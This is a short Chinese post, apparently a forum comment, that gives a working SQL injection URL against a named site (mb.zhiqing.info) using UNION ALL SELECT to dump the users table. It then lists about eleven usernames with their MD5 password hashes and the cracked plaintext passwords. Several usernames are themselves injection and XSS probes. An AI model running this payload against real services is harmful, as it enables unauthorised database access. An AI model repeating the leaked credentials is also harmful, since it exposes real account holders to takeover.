再来个炸弹:
http://mb.zhiqing.info/u/%22%20union%20ALL%20select%20name%20as%20user,password%20as%20post,%200%20as%20time%20from%20users%20where%20%22%22=%22根据查出来的结果, 以及根据代码中密码的写入方式得知是 MD5 + base64 的结果,所以...
以下为目前列出来的账号的密码:
zhiqing f57b888bc53ccfa3e4a71f19604df23c 找到了,但是是一条付费才能看的.
qwe 76d80224611fc919a5d54f0ff9fba446 qwe
123 202cb962ac59075b964b07152d234b70 123
<h1>123</h1> 5e6535e26cf8c546395f4e3f4c5d189e 未找到
123qwe 46f94c8de14fb36680850768ff1b7f2a 123qwe
3123 e10adc3949ba59abbe56e057f20f883e 123456
<img src=x> eb6cd2e33d39e677b19b611fe2eb32ee 未找到
jerry 202cb962ac59075b964b07152d234b70 123
foo 37b51d194a7513e45b56f6524f2d51f2 bar
" or ""=" e10adc3949ba59abbe56e057f20f883e 123456
tet111 4297f44b13955235245b2497399d7a93 123123